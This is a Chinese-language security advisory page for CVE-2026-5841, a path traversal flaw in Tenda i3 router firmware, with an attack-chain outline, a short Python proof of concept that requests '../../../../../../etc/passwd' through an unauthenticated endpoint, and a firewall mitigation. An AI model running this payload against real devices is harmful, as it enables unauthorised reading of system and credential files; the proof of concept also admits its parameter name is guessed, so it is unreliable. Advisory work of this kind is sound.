IPBUF安全漏洞报告
English
CVE-2026-5841 CVSS 7.3 高危

CVE-2026-5841 Tenda i3 路径遍历漏洞

披露日期: 2026-04-09

漏洞信息

漏洞编号
CVE-2026-5841
漏洞类型
路径遍历
CVSS评分
7.3 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Tenda i3

相关标签

路径遍历Tenda i3IoT漏洞无需认证远程攻击

漏洞概述

Tenda i3路由器固件版本1.0.0.6(2204)中的HTTP处理组件R7WebsSecurityHandler被识别出存在路径遍历漏洞。该漏洞源于组件在处理特定HTTP请求时对用户输入缺乏充分的验证机制。攻击者无需经过身份认证即可远程发起攻击,通过构造恶意数据包操纵文件路径,进而遍历服务器文件系统。攻击者可能利用此漏洞读取敏感配置文件或执行未授权操作。鉴于公开利用代码已发布,建议用户尽快采取防护措施。

技术细节

该漏洞位于Tenda i3路由器的R7WebsSecurityHandler处理函数中,该函数主要负责处理HTTP请求并进行安全检查。然而,在实现过程中,开发人员未对传入的路径参数进行严格的边界检查或目录遍历字符(如../)过滤。当攻击者向受影响设备发送包含恶意路径的HTTP请求时,R7WebsSecurityHandler会错误地将该路径拼接至系统根目录或Web根目录之外。由于CVSS向量显示无需用户交互(UI:N)且无需权限(PR:N),攻击者可以通过网络直接访问该接口。利用过程通常涉及发送特制的GET或POST请求,其中包含经过编码的目录遍历序列。成功利用后,攻击者能够绕过Web目录限制,访问操作系统中的任意文件(如/etc/passwd或配置文件),导致信息泄露。

攻击链分析

STEP 1
1. 信息收集
攻击者扫描网络,识别出运行固件版本为1.0.0.6(2204)的Tenda i3路由器设备。
STEP 2
2. 构造恶意请求
攻击者利用R7WebsSecurityHandler函数的漏洞,在HTTP请求参数中插入“../”等路径遍历字符,指向系统敏感文件。
STEP 3
3. 发起攻击
由于无需认证,攻击者直接通过网络向目标设备发送特制的HTTP POST/GET请求。
STEP 4
4. 获取数据
设备处理请求时未正确过滤路径,导致攻击者成功读取/etc/passwd等敏感文件,造成信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target configuration target_ip = "192.168.0.1" base_url = f"http://{target_ip}" # The vulnerable endpoint mentioned in the CVE description endpoint = "/goform/R7WebsSecurityHandler" # Payload attempting path traversal to read /etc/passwd # Note: The exact parameter name might vary based on reverse engineering payload = { "file": "../../../../../../etc/passwd" } try: print(f"[*] Sending exploit request to {target_ip}...") response = requests.post(base_url + endpoint, data=payload, timeout=10) if response.status_code == 200: if "root:" in response.text: print("[+] Exploit successful! Sensitive data retrieved:") print(response.text) else: print("[-] Request sent, but vulnerability pattern not confirmed in response.") print(response.text[:200]) else: print(f"[-] Server returned status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error connecting to target: {e}")

影响范围

Tenda i3 1.0.0.6(2204)

防御指南

临时缓解措施
如果无法立即升级固件,建议将路由器放置在防火墙后,禁止从互联网侧访问管理端口(80/443),并修改默认管理密码以降低风险。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表